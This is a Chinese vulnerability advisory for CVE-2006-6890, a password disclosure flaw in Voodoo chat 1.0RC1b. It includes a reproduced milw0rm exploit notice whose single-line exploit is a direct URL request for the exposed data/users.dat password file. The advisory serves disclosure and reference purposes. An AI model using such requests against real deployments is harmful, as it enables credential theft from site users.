Voodoo chat 'data/users.dat' 敏感信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111908 漏洞类型 未知
发布时间 2006-12-30 更新时间 2006-12-31
CVE编号 CVE-2006-6890 CNNVD-ID CNNVD-200612-700
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3044
https://www.securityfocus.com/bid/87096
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-700
|漏洞详情
Voodoochat在web的根目录下存储敏感信息且未采取有效的访问控制,远程攻击者可以通过直接请求data/users.dat下载密码。
|漏洞EXP
Voodoo chat 1.0RC1b Password Disclosure Vulnerability



Affected Software: Voodoo chat 1.0RC1b

Download: http://switch.dl.sourceforge.net/sourceforge/voc/voc-1.0RC1b.zip

Found3R: bd0rk

Website: www.soh-crew.it.tt

Contact: bd0rk[at]hackermail.com

Greetings: str0ke, Perle, TheJT, Shizoe

[+]Exploit: http://[yourh0st]/[voodoo_chat_dir]/data/users.dat



#####The german Hacker bd0rk#####

# milw0rm.com [2006-12-30]
|受影响的产品
Voc-Project Voodoo Chat 1.0 Rc1b
|参考资料

来源:XF
名称:voodoo-chat-users-info-disclosure(31221)
链接:http://xforce.iss.net/xforce/xfdb/31221
来源:MILW0RM
名称:3044
链接:http://www.milw0rm.com/exploits/3044
来源:MILW0RM
名称:3044
链接:http://milw0rm.com/exploits/3044